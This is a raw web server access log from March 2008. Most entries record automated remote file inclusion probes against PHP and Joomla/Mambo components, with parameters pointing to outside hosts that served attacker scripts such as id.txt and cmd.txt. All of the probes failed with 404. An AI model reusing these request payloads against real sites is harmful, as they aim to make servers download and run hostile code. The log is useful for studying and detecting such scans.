59.125.179.215 - - [23/Mar/2008:05:19:40 -0700] "GET /logs//include.php?path[docroot]=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.86.167.140 - - [23/Mar/2008:05:19:41 -0700] "GET /logs/access_080131.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
80.86.167.140 - - [23/Mar/2008:05:19:42 -0700] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
80.86.167.140 - - [23/Mar/2008:05:19:42 -0700] "GET /logs//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
80.86.167.140 - - [23/Mar/2008:05:19:58 -0700] "GET /logs/access_080218.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
69.10.154.114 - - [23/Mar/2008:05:21:05 -0700] "GET /logs/access_080126.log//mvcw_conver.php?step=http://gimpindustries.net/ca/images/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.10.154.114 - - [23/Mar/2008:05:21:05 -0700] "GET /logs/access_080126.log//mvcw_conver.php?step=http://gimpindustries.net/ca/images/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.10.154.114 - - [23/Mar/2008:05:21:05 -0700] "GET /logs/access_080126.log//mvcw_conver.php?step=http://randersnet.dk/themes/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.26.54.6 - - [23/Mar/2008:05:21:09 -0700] "GET /logs/access_080215.log/page.php?doc=http://qensch.freehostia.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.26.54.6 - - [23/Mar/2008:05:21:09 -0700] "GET /page.php?doc=http://qensch.freehostia.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.26.54.6 - - [23/Mar/2008:05:21:10 -0700] "GET /logs/page.php?doc=http://qensch.freehostia.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.86.167.140 - - [23/Mar/2008:05:21:12 -0700] "GET /logs/access_080126.log//modules/xfsection/modify.php?dir_module=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
62.44.73.116 - - [23/Mar/2008:05:21:26 -0700] "GET /logs/access_071214.log//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.44.73.116 - - [23/Mar/2008:05:21:27 -0700] "GET //modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.44.73.116 - - [23/Mar/2008:05:21:27 -0700] "GET /logs//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
204.213.247.235 - - [23/Mar/2008:05:21:56 -0700] "GET /logs/access_080126.log//mvcw_conver.php?step=http://gimpindustries.net/ca/images/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
87.230.15.10 - - [23/Mar/2008:05:22:14 -0700] "GET /logs/access_080124.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.15.10 - - [23/Mar/2008:05:22:15 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.15.10 - - [23/Mar/2008:05:22:17 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.169.166.115 - - [23/Mar/2008:05:22:28 -0700] "GET /logs/access_080129.log//skin/zero_vote/error.php?dir=http://www.idowebhosting.net/catalog/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.169.166.115 - - [23/Mar/2008:05:22:28 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.idowebhosting.net/catalog/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.169.166.115 - - [23/Mar/2008:05:22:31 -0700] "GET /logs/access_080129.log//skin/zero_vote/error.php?dir=http://www.idowebhosting.net/catalog/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.169.166.115 - - [23/Mar/2008:05:22:31 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.idowebhosting.net/catalog/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.30.214.232 - - [23/Mar/2008:05:22:50 -0700] "GET /logs/access_080120.log HTTP/1.0" 200 585838 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
81.169.166.115 - - [23/Mar/2008:05:22:57 -0700] "GET /logs/access_080120.log//skin/zero_vote/error.php?dir=http://www.idowebhosting.net/catalog/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.169.166.115 - - [23/Mar/2008:05:22:59 -0700] "GET /logs/access_080120.log//skin/zero_vote/error.php?dir=http://www.idowebhosting.net/catalog/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.198.89.199 - - [23/Mar/2008:05:23:14 -0700] "GET /logs/access_080219.log//include.php?path[docroot]=http://www.moonbaesool.co.kr/guest/icon/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.198.89.199 - - [23/Mar/2008:05:23:14 -0700] "GET //include.php?path[docroot]=http://www.moonbaesool.co.kr/guest/icon/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.198.89.199 - - [23/Mar/2008:05:23:14 -0700] "GET /logs//include.php?path[docroot]=http://www.moonbaesool.co.kr/guest/icon/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
85.25.137.24 - - [23/Mar/2008:05:23:37 -0700] "GET /logs/access_080223.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.25.137.24 - - [23/Mar/2008:05:23:38 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.25.137.24 - - [23/Mar/2008:05:23:38 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.26.54.6 - - [23/Mar/2008:05:23:54 -0700] "GET /logs/access_080211.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://qensch.freehostia.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.26.54.6 - - [23/Mar/2008:05:23:54 -0700] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://qensch.freehostia.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.26.54.6 - - [23/Mar/2008:05:23:55 -0700] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://qensch.freehostia.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.253.51.34 - - [23/Mar/2008:05:24:42 -0700] "GET /logs//index.php?option=com_poll&Itemid=30&mosConfig_absolute_path=http://www.folgoreclan.com/mio/controllo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.253.51.34 - - [23/Mar/2008:05:24:42 -0700] "GET /logs/access_080313.log//index.php?option=com_poll&Itemid=30&mosConfig_absolute_path=http://www.folgoreclan.com/mio/controllo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.25.137.24 - - [23/Mar/2008:05:25:04 -0700] "GET /logs/access.log//templates/mangobery/footer.sample.php?Site_Path=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.25.137.24 - - [23/Mar/2008:05:25:05 -0700] "GET //templates/mangobery/footer.sample.php?Site_Path=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.25.137.24 - - [23/Mar/2008:05:25:05 -0700] "GET /logs//templates/mangobery/footer.sample.php?Site_Path=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.29.70.163 - - [23/Mar/2008:05:25:13 -0700] "GET //skin/zero_vote/error.php?dir=http://www.randdesign.de/ppoint/include/main.txt?? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
72.29.70.163 - - [23/Mar/2008:05:25:13 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.randdesign.de/ppoint/include/main.txt?? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
72.29.70.163 - - [23/Mar/2008:05:25:14 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.masterkkarate.com/joomla/rofile.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
72.29.70.163 - - [23/Mar/2008:05:25:14 -0700] "GET //skin/zero_vote/error.php?dir=http://www.masterkkarate.com/joomla/rofile.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
72.29.70.163 - - [23/Mar/2008:05:25:14 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.masterkkarate.com/joomla/rotest.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
72.29.70.163 - - [23/Mar/2008:05:25:14 -0700] "GET //skin/zero_vote/error.php?dir=http://www.masterkkarate.com/joomla/rotest.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
72.30.216.107 - - [23/Mar/2008:05:25:35 -0700] "GET /logs/access_080215.log HTTP/1.0" 200 720896 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
87.117.225.155 - - [23/Mar/2008:05:25:43 -0700] "GET //skin/zero_vote/error.php?dir=http://www.fiobera.unam.edu.ar/moodledata/cache/test?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
87.117.225.155 - - [23/Mar/2008:05:25:43 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.fiobera.unam.edu.ar/moodledata/cache/test?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
72.29.70.163 - - [23/Mar/2008:05:26:31 -0700] "GET //skin/zero_vote/error.php?dir=http://www.fiobera.unam.edu.ar/moodledata/cache/test?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
72.29.70.163 - - [23/Mar/2008:05:26:32 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.fiobera.unam.edu.ar/moodledata/cache/test?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
72.29.70.163 - - [23/Mar/2008:05:26:41 -0700] "GET /logs/access_080129.log//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.70.163 - - [23/Mar/2008:05:26:41 -0700] "GET //skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.70.163 - - [23/Mar/2008:05:26:42 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
211.115.217.162 - - [23/Mar/2008:05:26:52 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://isnova.madeiratecnopolo.pt/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
211.115.217.162 - - [23/Mar/2008:05:26:52 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://isnova.madeiratecnopolo.pt/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
64.141.102.13 - - [23/Mar/2008:05:26:56 -0700] "GET /logs/access_080120.log//skin/zero_vote/error.php?dir=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.141.102.13 - - [23/Mar/2008:05:26:56 -0700] "GET //skin/zero_vote/error.php?dir=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.141.102.13 - - [23/Mar/2008:05:26:56 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.141.102.13 - - [23/Mar/2008:05:27:00 -0700] "GET /logs/access_080120.log//skin/zero_vote/error.php?dir=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.141.102.13 - - [23/Mar/2008:05:27:00 -0700] "GET //skin/zero_vote/error.php?dir=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.141.102.13 - - [23/Mar/2008:05:27:01 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.86.167.140 - - [23/Mar/2008:05:27:09 -0700] "GET /logs/access_080124.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
80.86.167.140 - - [23/Mar/2008:05:27:09 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
80.86.167.140 - - [23/Mar/2008:05:27:09 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
193.253.51.34 - - [23/Mar/2008:05:27:12 -0700] "GET /logs/access_080207.log//index.php?option=com_poll&Itemid=30&mosConfig_absolute_path=http://www.folgoreclan.com/mio/controllo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.19.158.41 - - [23/Mar/2008:05:27:18 -0700] "GET /logs/access_080218.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.19.158.41 - - [23/Mar/2008:05:27:19 -0700] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.19.158.41 - - [23/Mar/2008:05:27:20 -0700] "GET /logs//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.29.70.163 - - [23/Mar/2008:05:27:36 -0700] "GET /logs/access_080120.log//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.26.54.6 - - [23/Mar/2008:05:27:45 -0700] "GET /logs/access_080201.log/administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://qensch.freehostia.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.26.54.6 - - [23/Mar/2008:05:27:45 -0700] "GET /administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://qensch.freehostia.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.26.54.6 - - [23/Mar/2008:05:27:46 -0700] "GET /logs/administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://qensch.freehostia.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.137.24 - - [23/Mar/2008:05:27:53 -0700] "GET /logs/access_080204.log//templates/mangobery/footer.sample.php?Site_Path=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.198.89.199 - - [23/Mar/2008:05:28:04 -0700] "GET /logs/access_080207.log//include.php?path[docroot]=http://www.moonbaesool.co.kr/guest/icon/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.227.208.12 - - [23/Mar/2008:05:28:06 -0700] "GET /errors.php?error=http://www.idowebhosting.net/catalog/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
83.149.236.170 - - [23/Mar/2008:05:28:18 -0700] "GET //index.php?option=com_mtree&Itemid=&mosConfig_absolute_path=http://www.geocities.com/cakep_abis/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.149.236.170 - - [23/Mar/2008:05:28:26 -0700] "GET //index.php?option=com_mtree&Itemid=&mosConfig_absolute_path=http://www.geocities.com/cakep_abis/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.245.149.70 - - [23/Mar/2008:05:28:27 -0700] "GET /administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://theninjalegion.com/etc/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
77.245.149.70 - - [23/Mar/2008:05:28:28 -0700] "GET /logs/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://theninjalegion.com/etc/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
65.55.213.31 - - [23/Mar/2008:05:28:41 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.213.31 - - [23/Mar/2008:05:28:43 -0700] "GET /logs/access_080213.log HTTP/1.0" 200 860363 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
72.30.216.107 - - [23/Mar/2008:05:28:50 -0700] "GET /logs/access_080225.log HTTP/1.0" 200 720896 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
87.118.102.153 - - [23/Mar/2008:05:29:05 -0700] "GET /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.smagz.com/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
87.118.102.153 - - [23/Mar/2008:05:29:05 -0700] "GET /logs/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.smagz.com/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
217.26.54.6 - - [23/Mar/2008:05:29:12 -0700] "GET /logs/access_080213.log/config.php?path_to_root=http://qensch.freehostia.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.26.54.6 - - [23/Mar/2008:05:29:12 -0700] "GET /config.php?path_to_root=http://qensch.freehostia.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.26.54.6 - - [23/Mar/2008:05:29:13 -0700] "GET /logs/config.php?path_to_root=http://qensch.freehostia.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
24.151.168.128 - - [23/Mar/2008:05:29:14 -0700] "GET /bikes/dteel/2008_02_23/IMG_4573s.JPG HTTP/1.1" 200 240669 "http://www.st-owners.com/forums/showthread.php?p=412790#post412790" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
69.10.154.114 - - [23/Mar/2008:05:29:22 -0700] "GET /logs/access_080201.log//mvcw_conver.php?step=http://www.neverfallenclan.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.10.154.114 - - [23/Mar/2008:05:29:22 -0700] "GET //mvcw_conver.php?step=http://www.neverfallenclan.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.10.154.114 - - [23/Mar/2008:05:29:22 -0700] "GET /logs//mvcw_conver.php?step=http://www.neverfallenclan.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
61.19.158.41 - - [23/Mar/2008:05:29:24 -0700] "GET /logs/access_080131.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.75.204.128 - - [23/Mar/2008:05:29:25 -0700] "GET /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.woopss.de/conf/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
62.75.204.128 - - [23/Mar/2008:05:29:25 -0700] "GET /logs/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.woopss.de/conf/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
217.26.54.6 - - [23/Mar/2008:05:30:04 -0700] "GET /logs/access_080220.log/administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://qensch.freehostia.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.125.179.215 - - [23/Mar/2008:05:30:26 -0700] "GET /logs/access_080207.log//include.php?path[docroot]=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.30.216.107 - - [23/Mar/2008:05:30:34 -0700] "GET /logs/access.log HTTP/1.0" 200 96103 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
216.227.208.12 - - [23/Mar/2008:05:30:36 -0700] "GET /logs/access_080120.log//skin/zero_vote/error.php?dir=http://www.idowebhosting.net/catalog/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.227.208.12 - - [23/Mar/2008:05:30:36 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.idowebhosting.net/catalog/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.193.246.175 - - [23/Mar/2008:05:31:07 -0700] "GET /logs/access_080228.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.193.246.175 - - [23/Mar/2008:05:31:07 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.193.246.175 - - [23/Mar/2008:05:31:08 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.26.54.6 - - [23/Mar/2008:05:31:19 -0700] "GET /logs/access_080228.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://qensch.freehostia.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.141.102.13 - - [23/Mar/2008:05:31:41 -0700] "GET /logs/access_080211.log//skin/zero_vote/error.php?dir=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.141.102.13 - - [23/Mar/2008:05:31:43 -0700] "GET /logs/access_080211.log//skin/zero_vote/error.php?dir=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.199.235.34 - - [23/Mar/2008:05:32:12 -0700] "GET /logs/access_080306.log//index.php?_REQUEST=&_REQUEST%5boption%5d=com_kochsuite&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.199.235.34 - - [23/Mar/2008:05:32:12 -0700] "GET //index.php?_REQUEST=&_REQUEST%5boption%5d=com_kochsuite&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.199.235.34 - - [23/Mar/2008:05:32:13 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST%5boption%5d=com_kochsuite&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.55.213.31 - - [23/Mar/2008:05:32:27 -0700] "GET /logs/access_080221.log HTTP/1.0" 200 1367346 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
72.29.70.163 - - [23/Mar/2008:05:32:37 -0700] "GET /errors.php?error=http://www.randdesign.de/ppoint/include/main.txt?? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
72.29.70.163 - - [23/Mar/2008:05:32:37 -0700] "GET /logs/errors.php?error=http://www.randdesign.de/ppoint/include/main.txt?? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
72.29.70.163 - - [23/Mar/2008:05:32:37 -0700] "GET /logs/errors.php?error=http://www.masterkkarate.com/joomla/rofile.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
